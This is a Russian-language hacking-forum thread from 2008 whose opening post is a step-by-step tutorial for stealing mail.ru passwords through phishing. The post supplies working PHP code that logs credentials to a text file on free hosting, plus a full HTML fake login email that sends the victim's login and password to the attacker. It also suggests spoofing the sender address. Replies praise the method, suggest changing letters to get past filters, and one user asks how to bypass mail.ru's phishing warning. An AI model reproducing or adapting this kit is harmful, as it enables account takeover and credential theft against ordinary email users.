Взлом почты на mail.ru [СИ] |
06.06.2008, 20:12
|
|
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514
Репутация:
3313
|
|
Взлом почты на mail.ru [СИ]
[::.INTRO.::]
Привет! В этой статье я буду повествовать о том, как взломать почтовый ящик на бесплатном почтовом сервисе mail.ru.
Статья предназначена для новичков, в СИ, а также для любого пользователя интернета, имеющего желание получить доступ к чужому аккаунту.
Но ладно не буду об этом долго писать и так понятно "зачем нужнен почтовый ящик взломщику  ", сами поймете.
Статья сгодится для новичков. Гуру просьба не читать.
[::.PREPARATION.::]
Для начала нам понадобится бесплатный(лучше платный) хостинг с поддержкой PHP.
Можно зарегистрироваться на любом из этих:
*только заранее убедитесь что хостинг поддерживает PHP
Код:
km.ru
nextmail.ru
hobby.ru
webrise.ru
lapin.ru
free.dl-hosting.ru
hostow.net
beplaced.ru
777host.ru
paltus.ru
miraclehost.ru
freebox.ru
alfaspace.net
k70.ru
hosting.promostudio.ru
chat.ru
maxhost.ru
nixup.com
e2e.ru
noka.ru
newmail.ru
boom.ru
h15.ru
hut.ru
jino-net.ru
pochta.ru
unlimhost.ru
onepage.ru
by.ru
sbn.bz
yard.ru
domainhosting.ru
orthodoxy.ru
webservis.ru
ru-web.net
activehost.ru
househost.ru
bestof.ru
addr.ru
hosting.dump.ru
pesni.ru
medbox.ru
fatal.ru
x5x.ru
hopshot.com
5gigs.com
wagoo.com
orgfree.com
awardspace.com
bobos.ca
www.host.sk
zportal.info
spaceall.de
3x.ro
sretenie.ru
dotgeek.org
sevhosting.net
o2g.net
www.jino-net.ru
www.nixup.com
newmail.ru
ho.com.ua/
wallSt.ru
hut.ru
holm.ru
e2e.ru
fatal.ru
host.sk
ut.ru
H1.ru
Hostmos.ru
Webm.ru
Rdcom.ru
narod.ru
front.ru
nm.ru
chat.ru
boom.ru
by.ru
Зарегистрировали? - идем дальше!
Что нам нужно:
Во-первых нам нужен сниффер(это скрипт, позволяющий сохранять принимаемые данные в текстовый файл):
PHP код:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Рассмотрим скрипт поподробнее:
Код:
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
Это строка определяет, то место, куда мы будем перенаправлять пользователя после авторизации на письме-фейке. - Сохраним в файл mes.php и зальем на хостинг.
- Также создадим в дирректории со скриптом файл mail.txt, и выставим на него права(chmod) 777
Пожалуй с хостингом - все!
Приступим к самому письму, которое мы будем отправлять жертве на мыло.
Код письма:
PHP код:
<table class=readlet cellpadding=0 cellspacing=0 border=0 width="100%"><tr>
<td id=aj_body>
<div id=let_body><base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg">
<table cellpadding=0 cellspacing=0 border=0 class=login>
<tr>
<td>Пользователь отправил вам скрытое письмо.<br> Для просмотра письма введите ваш логин и пароль .<br> </a></p></td>
</tr>
</table><font color=00;33;66 FACE="Arial" >
<h4 >Авторизация</h4>
</font>
<table cellpadding=0 cellspacing=0 border=0 class=login>
<form method="GET" action="http://адресссайта/mes.php">
<input type="hidden" name="mail" value="1">
<tr>
<td width=75>
<img src=http://img.mail.ru/0.gif height=1><br>Имя
</td>
<td width=150>
<input type="text" name="Login">
</td>
<td width=75>
<select name="Domain">
<option value="mail.ru" SELECTED>@mail.ru</option>
<option value="inbox.ru">@inbox.ru</option>
<option value="list.ru" >@list.ru</option>
<option value="bk.ru" >@bk.ru</option>
</select>
</td>
</tr>
<tr>
<td>
Пароль
</td>
<td>
<input type="password" name="Password">
</td>
<td>
<a href="http://www.mail.ru/pages/help/92.html" target=_new>Забыли пароль?</a>
</td>
</tr>
<tr>
<td> </td>
<td>
<input type=checkbox name="level" value=1 id="alien"><label for="alien">Чужой компьютер</label>
</td>
<td> </td>
</tr>
<tr>
<td> </td>
<td>
<input type="Submit" value=" Войти " xstyle="margin-top:4px">
</td>
<td> </td>
</tr></form>
</table><br><br>
Чтобы подробней узнать об услугах - посетите <a href="http://corp.mail.ru" target="_blank">Corp.Mail.Ru</a><br>
Национальная почтовая служба <a href="http://www.mail.ru" target="_blank">@Mail.ru</a> - лучшая бесплатная почта.
<base href="http://r.mail.ru/clb126684/r.mail.ru/clb126684/readmsg"></div>
Укажите в параметре action тега form - адресс вашего сайта(который вы зарегистрировали выше) и путь к снифферу mes.php.
[!] Надо обратить внимание что данные должны передоваться методом "GET"! Иначе ничего не выйдет.
Теперь остается отправить жертве письмо, желательно с подменой адресса.
Сделать это можно здесь:
Копируем код письма в поле для ввода и отправляем в формате html, предварительно заполнив поля.
Если жертва клюнет на это, значит вам повезло).
Узнать пароли вы сможете в файлике mail.txt.
[::.END.::]
Думаю все.
А уж как подойти ко взлому решать вам.
Спасибо за внимание!
Жду ваших отзывов.
До свидания!
Последний раз редактировалось ChaaK; 06.06.2008 в 20:32..
|
|
|
06.06.2008, 20:17
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
видел много материала по фейкам но все было както разброшено.. сдесь все собрано и пошагово разсмотрено. вобшем ГУД.)
Последний раз редактировалось sabe; 06.06.2008 в 20:26..
|
|
|
|
06.06.2008, 21:27
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
в принципе у каждого метода есть свои плюсы и минусы (без этого просто никак)
юудь то ббрут или протроянивание или фейки
поставил + статья наиболее полная для новичка
|
|
|
|
06.06.2008, 21:39
|
|
Banned
Регистрация: 29.05.2008
Сообщений: 116
Провел на форуме:
447871
Репутация:
208
|
|
А как же это?
 |
|
|
|
04.12.2008, 16:38
|
|
Участник форума
Регистрация: 19.07.2008
Сообщений: 168
Провел на форуме:
1312476
Репутация:
85
|
|
Сообщение от [:|||||:]
А как же это?
Это обходится в пару тегов...
|
|
|
|
06.06.2008, 22:19
|
|
Постоянный
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
Сообщение от ChaaK
У меня такого ни разу не повлялось!
это можно обойти изменив буквы в словах!
так дополняй скорее свою статью
|
|
|
|
07.06.2008, 08:04
|
|
Познающий
Регистрация: 20.06.2007
Сообщений: 99
Провел на форуме:
1129104
Репутация:
122
|
|
Моё мнение:
Не сложно,просто.
Но таких тем действительно было оч много.
Это называеться фейк и автор ничё про это не сказал.
Но и в тоже время от этого фейка мало что будет поскольку я чёто запутолся тем что будет отпровляться пись,а тама будет запрос авторизации. и тутже тама будет висеть табличка от администрации.
|
|
|
|
07.06.2008, 15:32
|
|
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100
Репутация:
773
|
|
ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...
Последний раз редактировалось Zitt; 07.06.2008 в 15:51..
|
|
|
|
07.06.2008, 15:52
|
|
Участник форума
Регистрация: 01.10.2006
Сообщений: 172
Провел на форуме:
1680584
Репутация:
73
|
|
Сообщение от Zitt
ufoPlast, я не гуру, далеко не гуру, и ся таковым не считаю.. А на счет отбивания охоты ты не прав.. Такие "как мы" как ты сказал.. не отбиваем, а создаем стимул для написание статей которые будет интересно читать... Извени но, когда нечего сказать лучше промалчать - 100% истина...
А я соглашусь с ufoPlast, все он правильно сказал.
|
|
|
|
24.01.2010, 13:12
|
|
Новичок
Регистрация: 23.01.2010
Сообщений: 8
Провел на форуме:
5463
Репутация:
0
|
|
Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась.
Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания:
Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль.
Как я понял вся беда в сниффере:
PHP код:
<?php
$f=fopen("mail.txt","at"); # файл куда сохранять
flock($f,2);
fputs($f,$_GET['Login']."@"); #логин
fputs($f,$_GET['Domain']); #домен
fputs($f,";".$_GET['Password']."\n"); # пароль
flock($f,3);
fclose($f);
?>
<script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста.
Разумеется в файле моем комментариев нет.
Последний раз редактировалось Babkin; 24.01.2010 в 13:17..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [:|||||:]](/avatars/avatar57317.jpg?720784){kind=avatar}
![Отправить сообщение для [:|||||:] с помощью MSN](fusion/misc/im_msn.gif)
Похожие темы
Комбинированный вид
